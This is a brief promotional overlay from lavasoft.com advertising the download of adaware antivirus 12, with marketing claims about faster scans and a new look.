Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now